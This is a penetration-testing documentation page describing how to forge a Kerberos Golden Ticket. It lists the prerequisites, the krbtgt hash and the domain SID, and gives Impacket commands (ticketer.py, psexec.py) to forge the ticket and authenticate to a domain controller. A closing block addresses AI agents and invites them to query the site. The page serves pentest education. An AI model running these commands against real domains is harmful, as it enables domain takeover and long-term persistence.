> For the complete documentation index, see [llms.txt](https://ttp.parzival.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/domain-dominance/create_golden_ticket.md).

# Forge Golden Ticket

A Golden Ticket attack is a type of attack in which an adversary gains control over an Active Directory Key Distribution Service Account (KRBTGT), and uses that account to forge valid Kerberos Tickets. A golden ticket will allow you to persist in an environment almost indefinitely.

### Prerequisites for creating a Golden Ticket:

1. The NT hash of the `krbtgt` account. This can be obtained from running `secretsdump.py` on the Domain Controller.
2. Domain SID. This can be obtained by using `LookupSID.py` on the Domain Controller.
3. Domain name. This can be gathered by querying it on the Domain Controller or will have been gathered throughout the penetration test.
4. Username to impersonate. This should be a valid user on the domain.

### Creating a Golden Ticket on Linux with Impacket

1\. Use ticket.py to customize, sign, and save the ticket:

```bash
ticketer.py -nthash [NTHASH] -domain-sid [SID] -domain [DOMAIN] [USER]
```

2\. Export the ticket:

```bash
export KRB5CCNAME=[USER.CCACHE]
```

3\. Authenticate with the created ticket to the domain controller:

```bash
psexec.py [DOMAIN]/[USER]@[HOST] -k -no-pass -dc-ip [DOMAINCONTROLLER]
```

### References

{% embed url="<https://www.qomplx.com/qomplx-knowledge-golden-ticket-attacks-explained>" %}

{% embed url="<https://yojimbosecurity.ninja/golden-ticket-with-impacket>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/domain-dominance/create_golden_ticket.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.